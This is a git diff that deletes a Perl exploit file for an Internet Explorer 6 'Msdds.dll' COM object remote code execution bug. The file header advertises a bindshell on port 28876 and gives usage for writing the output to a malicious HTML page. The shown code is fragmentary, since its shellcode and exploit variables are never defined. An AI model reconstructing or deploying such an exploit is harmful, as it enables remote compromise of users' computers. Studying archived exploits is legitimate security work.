diff --git a/Perl/Constructor.Perl.Msdds.a b/Perl/Constructor.Perl.Msdds.a deleted file mode 100644 index 6b64b1cb..00000000 --- a/Perl/Constructor.Perl.Msdds.a +++ /dev/null @@ -1,80 +0,0 @@ -####################################################### -# -# Microsoft Internet Explorer "Msdds.dll" Remote Code Execution Exploit (0day) -# -# Bindshell on port 28876 - Vulnerability discovered and exploited by Anonymous -# -# PoC code ripped from Berend-Jan Wever's Internet-Exploiter -# -# Vulnerable : EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F (Msdds.dll) -# -# Tested on : Microsoft Internet Explorer 6 SP2 (Windows XP SP2) -# -# Code usage : perl IE-Msddsdll-0day.pl > mypage.html -# -####################################################### -# -# This program is free software; you can redistribute it and/or modify it under -# the terms of the GNU General Public License version 2, 1991 as published by -# the Free Software Foundation. -# -# This program is distributed in the hope that it will be useful, but WITHOUT -# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS -# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more -# details. -# -# A copy of the GNU General Public License can be found at: -# http://www.gnu.org/licenses/gpl.html -# or you can write to: -# Free Software Foundation, Inc. -# 59 Temple Place - Suite 330 -# Boston, MA 02111-1307 -# USA. -# -####################################################### - -# header -my $header = "\n\n"; - -# Msdds.dll -my $clsid = 'EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F'; - -# footer -my $footer = "\n". -"Microsoft Internet Explorer Msdds.dll COM Object Remote Exploit\n"; - -# print "Content-Type: text/html;\r\n\r\n"; # if you are in cgi-bin -print "$header $shellcode $code $footer"; \ No newline at end of file